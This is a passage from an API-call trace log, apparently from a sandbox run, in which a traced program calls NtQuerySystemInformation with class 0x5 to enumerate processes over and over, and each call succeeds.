SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x17438) returned 0x0 [0170.676] NtQuerySystemInformation (in: 